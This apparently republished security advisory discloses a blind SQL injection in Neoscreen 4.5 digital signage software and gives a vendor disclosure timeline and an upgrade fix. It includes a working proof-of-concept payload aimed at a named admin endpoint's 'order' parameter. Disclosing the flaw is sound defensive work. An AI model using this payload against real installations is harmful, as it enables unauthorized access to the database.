Neoscreen 4.5 Blind SQL Injection

2016.07.26
Credit: Alex Haynes
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Exploit Title: Neoscreen Blind SQL injection Product: Neoscreen by Cube Digital Media Vulnerable Versions: 4.5 and all previous versions Tested Version: 4.5 Advisory Publication: July 24, 2016 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89] CVE Reference: NONE Credit: Alex Haynes Advisory Details: (1) Vendor & Product Description -------------------------------- Vendor: Cube Digital Media Product & Version: Neoscreen digital signage software v4.5 Vendor URL & Download: http://www.cube-display.fr Product Description: "Neoscreen is an innovative, scalable and particularly powerful communication system. With just a few clicks, you can control all your dynamic display screens from your PC, wherever they may be in the world. " (2) Vulnerability Details: -------------------------- Several URL's in the management software are vulnerable to SQL injection attacks. Proof of concept: POST TO /cubelocal/modules/neoscreen/admindiff/stats_diffusion.asp?mod_stat=&machine_id=0&idpod=0 HTTP/1.1 Vulnerable parameter: order Payload: idpod_choisi=tous&periodeMM=1&periodeMMFin=12&periodeAA=2015&order=IIF(5968=5968,5968,1/0)&orders=0 (3) Advisory Timeline: ---------------------- 25/01/2016 - First Contact: vendor responds saying they are working on fix 24/02/2016 - Follow up e-mail to request fix timeline. No vendor response. 03/03/2016 - Follow up e-mail to request fix timeline. 04/03/2016 - Vendor responds saying fix will be available 14/03/2016. (4)Solution: ------------ Upgrade to version 5.0 (5) Credits: ------------ Discovered by Alex Haynes


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top